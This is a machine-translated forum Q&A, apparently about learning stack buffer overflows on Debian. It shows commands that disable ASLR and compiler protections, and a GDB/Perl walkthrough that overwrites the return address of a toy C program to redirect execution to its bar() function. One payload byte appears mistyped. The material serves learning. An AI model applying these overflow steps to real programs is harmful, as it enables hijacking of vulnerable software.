如何测试现代系统上的缓冲区溢出？

Question

我目前感兴趣的是学习如何进行缓冲区溢出。我已经完成了相当多的组装，并且了解了堆栈是如何工作的，以及如何在C中实现缓冲区溢出。然而，为了让GCC 4.9.1能够正确溢出缓冲区，我遇到了一些麻烦。我在运行Debian Jessie。

Here是我试图在2.2节中学习的教程。我复制/粘贴了他提供的C程序，我使用的是与他相同的Perl脚本，所以一切都与他的情况完全相同(当然，系统除外)。

这些都是我不断得到的结果：

 ~/projects/buffer-overflow$ ls
 run.pl  test.c
 ~/projects/buffer-overflow$ sudo su 
 root@wash# echo "0" > /proc/sys/kernel/randomize_va_space 
 root@wash# exit
 exit
 ~/projects/buffer-overflow$ gcc -m32 -fno-stack-protector -zexecstack test.c 
 ~/projects/buffer-overflow$ ./run.pl 
 Address of foo = 0x804845b
 Address of bar = 0x80484a4
 My stack looks like:
 (nil)
 0xffffd4a8
 0xf7e58b2f
 0xf7fb3ac0
 0x8048657
 0xffffd494

 ABCDEFGHIJKLMNOPP@
 Now the stack looks like:
 0xffffd718
 0xffffd4a8
 0xf7e58b2f
 0xf7fb3ac0
 0x42418657
 0x46454443

Answer 1

Perl脚本在这里并不特别有用，不同的系统将使用不同的地址，所以让我们不使用这个脚本.

首先，找出覆盖返回地址所需的确切字节数。我们可以用GDB和Perl来完成这个任务：

(gdb) run `perl -e 'print "A" x 26';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
 0xffffdaa8

AAAAAAAAAAAAAAAAAAAAAAAAAA
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

如您所见，26个字节将覆盖EIP，因此，通过用bar()函数地址替换最后四个"A“字符(别忘了用小endian格式)，我们应该成功了：

(gdb) run `perl -e 'print "A" x 22';``perl -e 'print "\xa5\x84\x04\x8"';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
 0xffffdaa8

AAAAAAAAAAAAAAAAAAAAAA��
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141

Augh! I've been hacked!

Program received signal SIGSEGV, Segmentation fault.
0xffffdc06 in ?? ()

如您所见，我们成功地返回了函数bar()。

Answer 2

我会尝试-fno-stack-protector-all (添加-all)和其他-O吗？选项，因为一些优化打开了一些-fxxx。